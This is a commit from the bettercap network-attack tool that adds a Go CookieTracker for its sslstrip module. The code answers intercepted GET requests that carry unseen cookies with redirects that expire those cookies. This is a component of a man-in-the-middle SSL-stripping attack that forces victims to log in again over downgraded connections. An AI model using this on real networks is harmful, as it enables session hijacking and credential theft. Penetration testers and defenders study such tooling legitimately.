new: implemented sslstrip (ref #154)

2025-08-21 14:03:17 -07:00 · 2018-03-09 12:10:43 +01:00 · 2018-03-09 12:10:43 +01:00 · 2a601e1412
commit 2a601e1412
parent d8223d9579
6 changed files with 231 additions and 203 deletions
--- a/modules/http_proxy_base_cookietracker.go
+++ b/modules/http_proxy_base_cookietracker.go
@ -0,0 +1,84 @@
+package modules
+
+import (
+	"fmt"
+	"net/http"
+	"strings"
+	"sync"
+
+	"github.com/bettercap/bettercap/log"
+
+	"github.com/elazarl/goproxy"
+	"github.com/jpillora/go-tld"
+)
+
+type CookieTracker struct {
+	sync.RWMutex
+	set map[string]bool
+}
+
+func NewCookieTracker() *CookieTracker {
+	return &CookieTracker{
+		set: make(map[string]bool),
+	}
+}
+
+func (t *CookieTracker) domainOf(req *http.Request) string {
+	if parsed, err := tld.Parse(req.Host); err != nil {
+		log.Warning("Could not parse host %s: %s", req.Host, err)
+		return req.Host
+	} else {
+		return fmt.Sprintf("%s.%s", parsed.Domain, parsed.TLD)
+	}
+}
+
+func (t *CookieTracker) keyOf(req *http.Request) string {
+	client := strings.Split(req.RemoteAddr, ":")[0]
+	domain := t.domainOf(req)
+	return fmt.Sprintf("%s-%s", client, domain)
+}
+
+func (t *CookieTracker) IsClean(req *http.Request) bool {
+	t.RLock()
+	defer t.RUnlock()
+
+	// we only clean GET requests
+	if req.Method != "GET" {
+		return true
+	}
+
+	// does the request have any cookie?
+	cookie := req.Header.Get("Cookie")
+	if cookie == "" {
+		return true
+	}
+
+	// was it already processed?
+	if _, found := t.set[t.keyOf(req)]; found == true {
+		return true
+	}
+
+	// unknown session cookie
+	return false
+}
+
+func (t *CookieTracker) Track(req *http.Request) {
+	t.Lock()
+	defer t.Unlock()
+	t.set[t.keyOf(req)] = true
+}
+
+func (t *CookieTracker) Expire(req *http.Request) *http.Response {
+	domain := t.domainOf(req)
+	redir := goproxy.NewResponse(req, "text/plain", 302, "")
+
+	for _, c := range req.Cookies() {
+		redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, domain))
+		redir.Header.Add("Set-Cookie", fmt.Sprintf("%s=EXPIRED; path=/; domain=%s; Expires=Mon, 01-Jan-1990 00:00:00 GMT", c.Name, c.Domain))
+	}
+
+	redir.Header.Add("Location", req.URL.String())
+	redir.Header.Add("Connection", "close")
+
+	return redir
+}